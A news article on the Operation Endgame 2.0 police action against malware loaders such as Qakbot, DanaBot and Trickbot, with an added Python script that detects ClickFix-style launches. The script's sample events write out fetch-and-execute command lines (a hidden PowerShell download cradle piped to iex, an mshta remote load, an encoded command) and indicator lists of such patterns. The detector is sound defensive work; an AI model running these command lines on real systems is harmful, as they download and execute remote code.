Operation Endgame 2.0: 20 arrest warrants, hundreds of servers put out of action
International authorities are continuing to take action against malware. Arrest warrants and charges have been issued against more than 20 actors.
This banner awaited visitors to seized malware websites on the occasion of Operation Endgame 2.0.
(Image: BKA)
International law enforcement agencies continue to take action against malware authors. As part of "Operation Endgame 2.0", the security authorities from Germany – the BKA and the Public Prosecutor General's Office in Frankfurt am Main – have now hit the cyber criminals hard. In Germany alone, the authorities have taken 50 servers offline and 650 domains are no longer under the control of the cyber criminals.
Thirty-seven suspects have been identified by investigators and twenty international arrest warrants have been issued. In addition, the Frankfurt Public Prosecutor General's Office (Central Office for Combating Cybercrime, ZIT) is publicly searching for the suspected cybercriminals, using wanted posters for a total of 18 suspected members of the Trickbot and Qakbot groups. However, all of them are Russian citizens and are therefore likely to remain beyond the reach of Western justice. Nevertheless, the suspects' room for maneuver has shrunk, and their crypto wallets are lighter as well: investigators also seized Bitcoin worth the equivalent of 3.5 million euros.
The investigators also went after the malware authors' technical infrastructure: according to the press release, they removed a total of 300 servers from the perpetrators' control, either taking them offline or taking them over. Fifty of these servers were located in Germany. Only yesterday, Thursday 22 May, Microsoft and Europol announced that they had disabled the command-and-control infrastructure of the infostealer Lumma.
Droppers in the investigators' sights
The focus of the investigation is on the malware families Bumblebee, Latrodectus, Qakbot, DanaBot, HijackLoader, Warmcookie and Trickbot, all of which are droppers or loaders used to download further malware such as ransomware. This is no coincidence but a strategy: the authorities want to start at the first link of the "kill chain", the initial access to the targeted systems. That access often comes through malware loaders that pose as legitimate downloads, or that the victims execute themselves in "ClickFix" attacks, in which a fake captcha page instructs the user to paste and run a command. If this initial infection is prevented, the investigators explain, the criminals cannot carry out follow-on actions such as ransomware deployment in the first place.
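The ClickFix pattern mentioned above leaves a recognisable trace in endpoint telemetry: a script interpreter or other living-off-the-land binary started directly from the interactive shell (the Run dialog is a child of explorer.exe) with download or encoded-command arguments. The following Python script, an added example that is not part of the original article or of any BKA or Europol material, runs that check over a handful of constructed process-creation events in a simplified "parent | image | command line" form. The event lines, the indicator lists and the `classify` and `scan` function names are assumptions for illustration, not the format of any specific EDR product.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample events (not real telemetry), in the form
# "parent image | child image | child command line".
SAMPLE_EVENTS = [
    "explorer.exe | powershell.exe | powershell -w hidden -ep bypass -c \"iwr http://example.invalid/c.txt | iex\"",
    "explorer.exe | mshta.exe | mshta https://example.invalid/captcha.hta",
    "cmd.exe | powershell.exe | powershell -File C:\\scripts\\backup.ps1",
    "explorer.exe | notepad.exe | notepad.exe C:\\Users\\u\\todo.txt",
    "explorer.exe | powershell.exe | powershell -NoProfile -EncodedCommand SQBFAFgA...",
]

# Parents that indicate a user-driven launch (Run dialog, double-click).
INTERACTIVE_PARENTS = {"explorer.exe"}

# Interpreters and download helpers commonly pasted by ClickFix lures.
LOLBINS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "bitsadmin.exe",
}

# Command-line indicators: encoded commands, download cradles, URLs, hidden windows.
SUSPICIOUS_CMDLINE = re.compile(
    r"(-e(nc|ncodedcommand)?\b|\biwr\b|invoke-webrequest|downloadstring|"
    r"\biex\b|invoke-expression|https?://|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    image: str
    reasons: List[str] = field(default_factory=list)


def classify(event: str) -> Optional[Finding]:
    """Return a Finding when an event matches the ClickFix launch pattern.

    Both conditions must hold to keep noise down: an interpreter spawned
    straight from the interactive shell AND a suspicious command line.
    """
    parent, image, cmdline = (p.strip() for p in event.split("|", 2))
    reasons = []
    if parent.lower() in INTERACTIVE_PARENTS and image.lower() in LOLBINS:
        reasons.append("interpreter launched directly from the shell (Run dialog pattern)")
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_CMDLINE.finditer(cmdline)})
    if hits:
        reasons.append("suspicious arguments: " + ", ".join(hits))
    return Finding(image, reasons) if len(reasons) == 2 else None


def scan(events: List[str]) -> List[Finding]:
    """Run classify over a list of events and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding.image, "->", "; ".join(finding.reasons))
```

Requiring both the parent/child relationship and a command-line indicator is a deliberate choice: an administrator's scheduled `powershell -File` run from cmd.exe and a user opening Notepad from the desktop both fall through, while the two pasted download cradles and the encoded command are flagged.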
BKA President Holger Münch is satisfied: "Our strategies work – even in the supposedly anonymous darknet". Senior public prosecutor Krause, head of the ZIT, offers a positive interim conclusion: "International cooperation between law enforcement authorities to combat cybercrime is working and is constantly being further developed."
US Department of Justice brings charges against malware authors
The US authorities have also been busy in the context of Operation Endgame 2.0. The US Department of Justice has filed charges against the alleged main author of Qakbot, Rustam G., for his involvement in various attacks on companies in the United States and Canada. Together with his accomplices, he is alleged to have infected the victims' computers with Qakbot and other malware and used that access to deploy ransomware such as Prolock, Doppelpaymer, REvil, Conti, Black Basta and Cactus. A public prosecutor in California has also brought charges against a total of 16 suspects who are alleged to have developed and used the DanaBot malware. Alexandr S. and Artem K. from Novosibirsk, Russia, together with their accomplices, are alleged to have caused over 50 million US dollars in damage on more than 300,000 computers.
The second round of Operation Endgame follows its launch almost exactly one year ago, at the end of May 2024, when ten international arrest warrants were issued and four people were provisionally arrested.
(cku)